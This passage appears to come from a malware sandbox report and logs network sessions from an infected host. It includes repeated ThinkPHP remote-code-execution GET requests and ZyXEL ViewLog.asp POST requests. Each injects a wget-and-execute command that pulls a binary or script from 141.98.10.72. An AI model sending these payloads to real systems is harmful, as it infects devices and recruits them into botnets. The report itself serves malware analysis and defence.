20 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 73 6d 61 6c 6c 3b 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 70 6f 70 75 70 22 3e 0a 09 09 3c 68 32 3e 34 30 30 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 2e 3c 2f 68 32 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 0a 09 09 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 20 63 61 6e 6e 6f 74 20 62 65 20 75 6e 64 65 72 73 74 6f 6f 64 20 62 79 20 74 68 65 20 73 65 72 76 65 72 2c 20 70 72 6f 62 61 62 6c 79 20 64 75 65 20 74 6f 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 73 79 6e 74 61 78 2e 20 44 6f 20 6e 6f 74 20 74 72 79 20 69 74 20 61 67 61 69 6e 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 62 79 20 76 69 73 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>400</title><meta name="author" content="CAMSCAPE SERVICES SRL" /><style type="text/css">body {text-align:center;background:red;font:normal 16px Arial}div#popup {margin:100px auto;text-align:left;border:0px; width:400px; padding:20px;background:white;}img#logo {width:360px;}a.camscape,a.c-hosting,a.c-software,a.c-admin {text-decoration:none;}a.camscape{color:#2191B6!important;font-weight:bold;}a.c-hosting{color:red!important;}a.c-software{color:blue!important;}a.c-admin{color:green!important;}div.c-links {font-weight:normal;font-size:x-small;text-align:left;font-family:Arial,sans-serif;}div.left {text-align:left;font-size:small;}</style> </head> <body><div id="popup"><h2>400: The request could not be processed.</h2><div class="left"> The request cannot be understood by the server, probably due to a malformed syntax. Do not try it again, you may find what you are looking for by visi
Feb 14, 2024 09:29:33.844702959 CET	873	IN	Data Raw: 74 69 6e 67 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 62 72 2f 3e 0a 09 09 3c 62 72 2f 3e 0a 09 09 3c 68 32 3e 34 30 30 3a 20 Data Ascii: ting the website's <a href="/">home page</a>.</div><br/><br/><h2>400: Ati trimis o cerere ce nu poate fi procesata.</h2><div class="left"> Cererea nu poate fi inteleasa de catre server, probabil datorita unei sintaxe gresi

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.15	59262	88.218.158.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.661618948 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.878215075 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 11 Aug 2019 04:08:54 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
Feb 14, 2024 09:29:34.073343992 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 11 Aug 2019 04:08:54 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.15	55876	88.221.47.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.666095972 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.883097887 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:33 GMT Date: Wed, 14 Feb 2024 08:29:33 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 37 33 26 23 34 36 3b 32 63 31 37 66 38 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.248e2117.1707899373.2c17f865</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.15	59270	88.218.158.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.853105068 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:34.068268061 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 11 Aug 2019 04:08:55 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
Feb 14, 2024 09:29:34.261440039 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 11 Aug 2019 04:08:55 GMT Server: lighttpd/1.4.39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.15	53576	31.136.87.18	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.228141069 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.842009068 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.089967966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.585901976 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.705722094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.689477921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.680854082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:55.639935017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.15	46384	31.136.61.197	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.228260040 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.841996908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:36.089975119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.585884094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.705727100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.689542055 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.680900097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:55.639808893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.15	38864	85.50.210.206	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:34.232999086 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:34.477020979 CET	75	IN	HTTP/1.1 400 Bad Request Server: Rumpus Content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.15	47742	31.50.1.131	8080

Timestamp	Bytes transferred	Direction	Data
